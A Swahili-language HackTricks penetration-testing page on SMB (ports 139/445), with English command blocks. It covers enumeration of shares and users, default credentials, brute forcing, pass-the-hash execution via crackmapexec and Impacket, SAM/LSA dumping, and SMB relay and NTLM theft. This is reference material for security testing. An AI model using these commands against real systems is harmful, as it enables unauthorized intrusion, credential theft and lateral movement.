139,445 - Pentesting SMB
{{#include ../../banners/hacktricks-training.md}}
Port 139
The Network Basic Input Output System** (NetBIOS)** ni itifaki ya programu iliyoundwa kuwezesha programu, PCs, na Desktops ndani ya local area network (LAN) kuingiliana na vifaa vya mtandao na kurahisisha uhamishaji wa data kupitia mtandao. Utambulisho na eneo la programu zinazoendesha kwenye mtandao wa NetBIOS hufikiwa kupitia majina yao ya NetBIOS, ambayo yanaweza kuwa na hadi herufi 16 kwa urefu na mara nyingi ni tofauti na jina la kompyuta. Kikao cha NetBIOS kati ya programu mbili huanzishwa wakati programu moja (inayoitumikia kama client) inatoa amri ya "call" kwa programu nyingine (inayoitumikia kama server) ikitumia TCP Port 139.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
Port 445
Kiteknikali, Port 139 inatajwa kama ‘NBT over IP’, wakati Port 445 inatambulika kama ‘SMB over IP’. Herufi fupi SMB inasimama kwa ‘Server Message Blocks’, ambayo pia kwa sasa inajulikana kama Common Internet File System (CIFS). Kama itifaki ya tabaka la programu kwenye mtandao, SMB/CIFS hutumika hasa kuwezesha upatikanaji wa pamoja wa faili, printers, serial ports, na kurahisisha aina mbalimbali za mawasiliano kati ya nodes kwenye mtandao.
Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa haja ya NetBIOS over TCP/IP, kwa kutumia port 445. Kwa upande mwingine, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa sambamba na NetBIOS over TCP/IP.
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
SMB
Protokoli ya Server Message Block (SMB), inayofanya kazi kwa mfano wa client-server, imeundwa kudhibiti ufikiaji wa faili, saraka, na rasilimali nyingine za mtandao kama printa na router. Kimsingi hutumika ndani ya mfululizo wa mfumo wa uendeshaji Windows, SMB hutoa uthabiti wa kurudi nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuwasiliana kwa urahisi na vinavyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa Samba unatoa suluhisho la programu ya bure, likiruhusu utekelezaji wa SMB kwenye mifumo ya Linux na Unix, na hivyo kuwezesha mawasiliano ya kuvuka-platform kupitia SMB.
Shares, zinazoonyesha sehemu yoyote ya mfumo wa faili wa eneo, zinaweza kutolewa na server ya SMB, na kufanya muundo wa saraka uonekane kwa mteja kwa sehemu huru kutoka muundo halisi wa server. Access Control Lists (ACLs), ambazo zinafafanua haki za ufikiaji, zinaruhusu udhibiti wa undani wa ruhusa za watumiaji, ikijumuisha sifa kama execute, read, na full access. Ruhusa hizi zinaweza kupewa watumiaji binafsi au makundi, kulingana na shares, na ni tofauti na ruhusa za eneo zilizoanzishwa kwenye server.
IPC$ Share
Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, ikiruhusu mwingiliano na huduma zilizoonyeshwa kupitia named pipes. Zana ya enum4linux ni muhimu kwa lengo hili. Ikiotumika kwa usahihi, inaruhusu kupata:
- Maelezo kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Orodha ya watumiaji na makundi wa ndani
- Taarifa kuhusu SMB shares zinazopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Utendaji huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini hali ya usalama ya huduma za SMB kwenye mtandao. enum4linux huwapa mtazamo kamilifu wa mazingira ya SMB ya mfumo lengwa, jambo la msingi kwa kubaini udhaifu unaoweza kutumika na kuhakikisha kuwa huduma za SMB zimeshika usalama ipasavyo.
enum4linux -a target_ip
The above command is an example of how enum4linux might be used to perform a full enumeration against a target specified by target_ip.
NTLM ni nini
Ikiwa haujui NTLM ni nini au unataka kuelewa jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu NTLM wa kuvutia, unaoelezea jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:
{{#ref}} ../../windows-hardening/ntlm/ {{#endref}}
Server Enumeration
Scan a network searching for hosts:
nbtscan -r 192.168.0.1/24
Toleo la server la SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua ni toleo gani linatumika. Ikiwa taarifa hii haitokei kwenye zana nyingine zinazotumika, unaweza:
- Tumia MSF auxiliary module
**auxiliary/scanner/smb/smb_version** - Au script hii:
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
Tafuta exploit
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
Inawezekana Credentials
| Username(s) | Common passwords |
|---|---|
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
Brute Force
Taarifa za Mazingira za SMB
Pata Taarifa
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
Orodhesha Watumiaji, Makundi & Watumiaji Walioingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa na enum4linux na enum4linux-ng
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
Orodhesha watumiaji wa ndani
lookupsid.py -no-pass hostname.local
Mstari mmoja
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Metasploit - Orodhesha watumiaji wa ndani
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
Kuorodhesha LSARPC na SAMR rpcclient
{{#ref}} rpcclient-enumeration.md {{#endref}}
Muunganisho wa GUI kutoka linux
Katika terminal:
xdg-open smb://cascade.htb/
Katika dirisha la kivinjari cha faili (nautilus, thunar, n.k)
smb://friendzone.htb/general/
Kuorodhesha Folda Zilizoshirikiwa
Orodhesha folda zilizoshirikiwa
Kila mara inashauriwa kuangalia kama unaweza kupata chochote; kama huna credentials jaribu kutumia null credentials/guest user.
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
Unganisha/Orodhesha folda iliyoshirikiwa
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
Orodhesha kwa mkono windows shares na kuziunganisha
Inawezekana umezuiliwa kuonyesha shares yoyote za mashine mwenyeji, na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares zozote za kuunganishwa. Hivyo, inaweza kuwa vyema kujaribu kwa mkono kuungana kwenye share. Ili kuorodhesha shares kwa mkono, unaweza kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, ukiwa unatumia kikao halali (kwa mfano null session au valid credentials). Haya yanaweza kuashiria ikiwa share ipo na wewe huna ruhusa ya kuipata, au share haipo kabisa.
Common share names for windows targets are
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
(Common share names from Network Security Assessment 3rd edition)
Unaweza kujaribu kuungana nazo kwa kutumia amri ifuatayo
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
au script hii (ikitumia null session)
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
mifano
smbclient -U '%' -N \\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
Orodhesha shares kutoka Windows / bila zana za wahusika wa tatu
PowerShell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
konsoli ya CMD
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
MMC Snap-in (grafiki)
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
explorer.exe (graphical), ingiza \\<ip>\ ili kuona non-hidden shares zinazopatikana.
Unganisha folda iliyoshirikiwa
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
Pakua mafaili
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
Amri:
- mask: inaelezea mask ambayo inatumiwa kuchuja faili ndani ya saraka (mfano: "" kwa faili zote)
- recurse: hugeuza recursion kuwa on (default: off)
- prompt: huzimisha kuuliza majina ya faili (default: on)
- mget: inakopi faili zote zinazolingana na mask kutoka host hadi client machine
(Taarifa kutoka kwenye manpage ya smbclient)
Utafutaji wa Folda Zilizoshirikiwa za Domain
Snaffler.exe -s -d domain.local -o snaffler.log -v data
- CrackMapExec spider.
-M spider_plus [--share <share_name>]--pattern txt
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
Kinachovutia hasa kutoka shares ni faili zinazoitwa Registry.xml, kwani zinaweza kuwa na passwords za watumiaji waliowekwa na autologon kupitia Group Policy. Au faili za web.config kwa kuwa zina credentials.
Tip
The SYSVOL share inaweza kusomwa na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza kupata aina nyingi za batch, VBScript, na PowerShell scripts.
Unapaswa kuangalia scripts zilizo ndani yake kwani unaweza kupata taarifa nyeti kama passwords.
Read Registry
Unaweza read the registry kwa kutumia credentials ulizozigundua. Impacket reg.py inakuwezesha kujaribu:
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
Post Exploitation
Mipangilio ya chaguo-msingi ya seva ya Samba kwa kawaida iko katika /etc/samba/smb.conf na inaweza kuwa na mipangilio hatari:
| Setting | Description |
|---|---|
browseable = yes |
Kuruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
read only = no |
Kuzuia uundaji na uhariri wa mafaili? |
writable = yes |
Kuruhusu watumiaji kuunda na kuhariri mafaili? |
guest ok = yes |
Kuruhusu kuunganishwa kwa huduma bila kutumia nenosiri? |
enable privileges = yes |
Kuheshimu vibali vilivyotangazwa kwa SID maalum? |
create mask = 0777 |
Ni ruhusa gani zinapaswa kutolewa kwa mafaili yaliyoundwa hivi karibuni? |
directory mask = 0777 |
Ni ruhusa gani zinapaswa kutolewa kwa directory mpya zilizoundwa? |
logon script = script.sh |
Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji? |
magic script = script.sh |
Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
magic output = script.out |
Wapi pato la magic script linapaswa kuhifadhiwa? |
Amri smbstatus inatoa taarifa kuhusu seva na kuhusu nani ameunganishwa.
Thibitisha kwa kutumia kerberos
Unaweza kuthibitisha kwa kerberos ukitumia zana smbclient na rpcclient:
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
In mazingira ya Kerberos pekee (NTLM imezimwa), jaribio za NTLM dhidi ya SMB zinaweza kurudisha STATUS_NOT_SUPPORTED. Rekebisha matatizo ya kawaida ya Kerberos na lazimisha uthibitishaji wa Kerberos:
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
Kwa ajili ya usanidi kamili wa mteja (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) angalia:
{{#ref}} ../pentesting-kerberos-88/README.md {{#endref}}
Tekeleza Amri
crackmapexec
crackmapexec inaweza kutekeleza amri kutumia yoyote ya mmcexec, smbexec, atexec, wmiexec, ambapo wmiexec ni njia ya chaguo-msingi. Unaweza kubainisha chaguo unachopendelea kutumia kwa parameter --exec-method:
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec/smbexec
Zote mbili zitaunda huduma mpya (kwa kutumia \pipe\svcctl kupitia SMB) kwenye mashine ya mwathirika na kuitumia kutekeleza kitu (psexec itafanya upload faili ya executable kwenye share ya ADMIN$ na smbexec itaelekeza kwa cmd.exe/powershell.exe na kuweka katika arguments payload --file-less technique--).
Taarifa zaidi kuhusu psexec and smbexec.
Kwenye kali iko kwenye /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
Kwa kutumia parameter-k unaweza kuthibitisha kwa kerberos badala ya NTLM
wmiexec/dcomexec
Fanya kwa kificho utekelezaji wa shell ya amri bila kugusa diski au kuanzisha huduma mpya ukitumia DCOM kupitia port 135.
Katika kali iko kwenye /usr/share/doc/python3-impacket/examples/
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
Kutumia kigezo-k unaweza kuthibitisha kwa kerberos badala ya NTLM
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
AtExec
Endesha amri kupitia Task Scheduler (ukitumia \pipe\atsvc kupitia SMB).
Katika kali iko kwenye /usr/share/doc/python3-impacket/examples/
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
Marejeo ya Impacket
https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/
Uso wa mashambulizi wa ksmbd na fuzzing ya protocol ya SMB2/SMB3 (syzkaller)
{{#ref}} ksmbd-attack-surface-and-fuzzing-syzkaller.md {{#endref}}
Bruteforce credentials za watumiaji
Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utaizidi idadi ya majaribio iliyoruhusiwa
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
SMB relay attack
Shambulio hili linatumia Responder toolkit ili capture SMB authentication sessions kwenye mtandao wa ndani, na relays kwa target machine. Ikiwa authentication session itafanyika kwa mafanikio, itakuingiza moja kwa moja ndani ya system shell.
More information about this attack here.
SMB-Trap
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: img src="\\10.10.10.10\path\image.jpg"
Hii hutokea na functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Ambazo zinatumiwa na baadhi ya browsers na tools (kama Skype)
SMBTrap using MitMf
NTLM Theft
Similar to SMB Trapping, kuweka faili zenye madhara kwenye target system (kupitia SMB, kwa mfano) kunaweza kusababisha jaribio la SMB authentication, kuruhusu NetNTLMv2 hash kukamatwa na tool kama Responder. Hash inaweza kisha ku crack offline au kutumika katika an SMB relay attack.
HackTricks Automatic Commands
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.
#These are the commands I run in order every time I see an open SMB port
With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smb/index.html
Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}
Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}
Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
Marejeo
- NetExec (CME) wiki – Kerberos usage
- Pentesting Kerberos (88) – client setup and troubleshooting
- 0xdf – HTB: TheFrizz
{{#include ../../banners/hacktricks-training.md}}